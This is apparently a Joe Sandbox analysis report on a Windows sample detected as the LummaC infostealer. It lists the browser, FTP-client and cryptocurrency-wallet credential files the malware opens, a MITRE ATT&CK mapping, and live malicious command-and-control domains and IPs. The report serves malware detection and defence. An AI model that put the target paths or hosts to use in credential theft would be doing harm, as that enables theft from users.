Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Climb.com	Binary or memory string: WIN_81
Source: Climb.com	Binary or memory string: WIN_XP
Source: Alt.11.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Climb.com	Binary or memory string: WIN_XPe
Source: Climb.com	Binary or memory string: WIN_VISTA
Source: Climb.com	Binary or memory string: WIN_7
Source: Climb.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior

Source: Yara match

File source: Process Memory Space: Climb.com PID: 6172, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00502263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		14_2_00502263
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00501C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		14_2_00501C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Access Token Manipulation	12 Software Packing	NTDS	239 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	1071 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	461 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	461 Virtualization/Sandbox Evasion	Proc Filesystem	14 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ZTM2pfyhu3.exe	34%	ReversingLabs
ZTM2pfyhu3.exe	100%	Avira	HEUR/AGEN.1313526
ZTM2pfyhu3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\768400\Climb.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	100%	Avira URL Cloud	malware
https://spuriotis.click:443/apil	0%	Avira URL Cloud	safe
https://spuriotis.click/D	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	100%	Avira URL Cloud	malware
https://spuriotis.click/	0%	Avira URL Cloud	safe
spuriotis.click	0%	Avira URL Cloud	safe
https://spuriotis.click/api	0%	Avira URL Cloud	safe
https://spuriotis.click//	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003Q	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
spuriotis.click	104.21.2.51	true	true	unknown
home.fortth14ht.top	185.121.15.192	true	false	high
httpbin.org	34.226.108.155	true	false	high
yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: malware	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: malware	unknown
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://spuriotis.click/api	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high
prisonyfork.buzz	false		high
spuriotis.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://duckduckgo.com/chrome_newtab	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Climb.com, 0000000E.00000003.2424180192.00000000041EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000003.00000002.2349973615.00000000005D9000.00000004.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://www.autoitscript.com/autoit3/	Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	false		high
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
https://spuriotis.click//	Climb.com, 0000000E.00000002.2524996608.0000000001748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click/D	Climb.com, 0000000E.00000002.2524996608.0000000001748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://spuriotis.click/	Climb.com, 0000000E.00000002.2524996608.0000000001748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Climb.com, 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000000.2104691821.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
https://www.ecosia.org/newtab/	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click:443/apil	Climb.com, 0000000E.00000002.2525190238.000000000185C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://httpbin.org/ipbefore	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	Climb.com, 0000000E.00000003.2424180192.00000000041EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963	Set-up.exe, 00000003.00000003.2349004763.0000000001047000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348806436.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348834892.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2349168343.000000000104A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003Q	Set-up.exe, 00000003.00000003.2349004763.0000000001047000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348806436.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348834892.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2349168343.000000000104A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain	207046	REDSERVICIOES	false
34.226.108.155	httpbin.org	United States	14618	AMAZON-AESUS	false
104.21.2.51	spuriotis.click	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581384
Start date and time:	2024-12-27 14:50:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZTM2pfyhu3.exe renamed because original name is a hash value
Original Sample Name:	d08440343dcfebe534564ab0084f5f65.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/23@10/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 2836 because there are no executed function
Execution Graph export aborted for target ZTM2pfyhu3.exe, PID 5308 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ZTM2pfyhu3.exe

Simulations

Behavior and APIs

Time	Type	Description
08:51:06	API Interceptor	1x Sleep call for process: PasoCattle.exe modified
08:51:13	API Interceptor	9x Sleep call for process: Climb.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
34.226.108.155	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
home.fortth14ht.top	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
